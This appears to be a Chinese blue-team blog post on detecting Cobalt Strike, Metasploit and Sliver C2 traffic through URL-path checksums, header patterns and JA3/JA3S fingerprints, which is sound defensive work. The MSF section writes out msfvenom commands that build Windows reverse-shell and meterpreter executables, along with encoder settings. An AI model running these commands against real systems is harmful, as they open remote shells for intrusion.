EthanDoctor

蓝队技能-流量分析篇&C2工具类&HTTPS协议&JA3&JA3S值&请求包体&MSF&CS&Sliver

Ethan医生2个月前信息收集102


 蓝队技能-流量分析-C2远控工具

#蓝队技能-流量分析-C2远控工具

C2:

MSF、CS、SliverViperHavocVshellSupershell

 

#CS

HTTP

https://blog.didierstevens.com/didier-stevens-suite

https://github.com/DidierStevens/DidierStevensSuite

python 1768.py xxxx.vir

2、请求特征:间隔时间 URL路径 下发指令 UA头(老版本)

/cx

POST /submit.php?id=

3、路径特征:checksum8 (92L 93L

public class EchoTest {

public static long checksum8(String text) {

if (text.length() < 4) {

return 0L;

}

text = text.replace("/", "");

long sum = 0L;

for (int x = 0; x < text.length(); x++) {

sum += text.charAt(x);

}

 

return sum % 256L;

}

 

public static void main(String[] args) throws Exception {

System.out.println(checksum8("Yle2"));

}

}

 

 

HTTPS:

1、证书特征(.store)

2、源码特征(ja3 ja3s

client hello 4d5efa96609dc906f796e63cff009c2a db36bad574044a5104a59b0c676991ef

server hello 15af977ce25de452b96affa2addb1036 2253c82f03b621c5144709b393fde2c9

 

 

#MSF

1、shell模式 明文传输

msfvenom -p windows/x64/shell/reverse_tcp lhost=xx lport=6666 -f exe -o 6666.exe

特征:从数据包明文中判断命令执行

 

2、meterpreter模式 HTTP

msfvenom -p windows/meterpreter/reverse_http lhost=xx lport=6667 -f exe -o 6667.exe

 

-UA头(版本决定)

Mozilla/5.0 (

 

-文件头

MZ标头和DOS模式异常

set enablestageencoding true

set stageencoder x86/shikata_ga_nai

 

特征:固定的数据包请求和返回模版(格式一致)

request和response返回的数据包格式一致

判断数据包的请求是不是固定的几个东西

GET /xxx(不固定) HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0(固定的是Mozilla/5.0 (

Host: xx.xx.xx.xx:xxxx

Connection: Keep-Alive

Cache-Control: no-cache

 

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Connection: Keep-Alive

Server: Apache

Content-Length: 176220(不固定)

 

3、meterpreter模式 HTTPS

msfvenom -p windows/meterpreter_reverse_https lhost=xx lport=6669 -f exe -o 6668.exe

JA3/JA3S值:

4d93395b1c1b9ad28122fb4d09f28c5e 652358a663590cfc624787f06b82d9ae

15af977ce25de452b96affa2addb1036 2253c82f03b621c5144709b393fde2c9

 

#Sliver

使用视频:162

使用参考:https://forum.butian.net/share/2243

项目下载:https://github.com/BishopFox/sliver

分析参考1:https://mp.weixin.qq.com/s/9PuyKtwY5WbjAGLbLHUmuw

分析参考2:https://mp.weixin.qq.com/s/G3ggCKxQy0nOqRuTUPHfiQ

 

HTTP:

路径特征:server\configs\http-c2.go

固定url路径

参数名称的构造规律

参数值的长度及规律

sessionID/Cookie的交换

Cookie的名称生成、cookie值的长度及规律

 

根据路径文件名,后缀,cookie这些信息到源码里面的数组随机组合配合分析排查

 

HTTPS:

ja3/ja3s

19e29534fd49dd27d09234e639c4057e

f4febc55ea12b31ae17cfb7e614afda8

 

https://github.com/salesforce/ja3

https://github.com/Macr0phag3/ja3box

d:\Python3.8\python.exe ja3.py -a https.pcapng

d:\Python3.8\python.exe ja3s.py -a https.pcapng


标签: 蓝队技能
返回列表

上一篇:蓝队技能-流量分析篇&WebShell工具类&数据解密&特征研判&哥斯拉&天蝎&冰蝎&蚁剑

下一篇:蓝队技能-流量分析篇&内网隧道工具 类&版本标记&字符特征&FRP&NPS&reGeorg&Venom

相关文章

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

➢ 蓝队技能-Web入侵-入口&查杀&攻击链等#Web攻击事件获取当前WEB环境的组成架构(脚本,数据库,中间件,系统等)分析思路:1、利用时间节点筛选日志行为2、利用对漏洞...

蓝队技能-应急响应篇&内网攻防&爆破事件&代理隧道&流量提进程&系统日志&处置封锁

➢ 蓝队技能-内网攻防-口令爆破&隧道技术&排查&应急#口令横向场景说明:不管在内网还是在外网,协议口令爆破一直是攻击最常见的方式。1、明确对应口令爆破的日志存储路径...

蓝队技能-应急响应篇&日志采集&提取查看&自动化分析Web安全&内网攻防&工具项目

➢ 蓝队技能-工具项目-日志收集&提取查看&自动分析#日志自动提取1、七牛Logkit:(Windows&Linux&Mac等)项目地址:https://gi...

蓝队技能-溯源反制篇&暴打红队&C2远控&CS批量上线&CVE漏洞&口令爆破&NPS未授权

➢ 蓝队技能-溯源反制-C2CS&应用平台#溯源反制-远程控制工具-CobaltStrike对抗Cobaltstrike中的手段:1、伪造流量批量上线(欺骗防御)条件:知道对方的CS...

蓝队技能-报告书写篇&红蓝队&云函数域前置溯源反制&渗透测试&值守日报&安全简历模版

➢ 红蓝队技能-报告书写-渗透测试&值守日报&安全简历漏洞风险报告https://github.com/s1g0day/ShitReport 渗透测试报告启动环境:...

蓝队技能-设备部署篇&雷池WAF保护Web&蜜罐HFish溯源&堡垒机JumpServer资产管理

➢ 蓝队技能-设备部署-WAF-Web-雷池➢ 蓝队技能-设备部署-蜜罐-服务-HFish➢ 蓝队技能-设备部署-堡垒机-JumpServer#WAF-雷池SafeLin...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号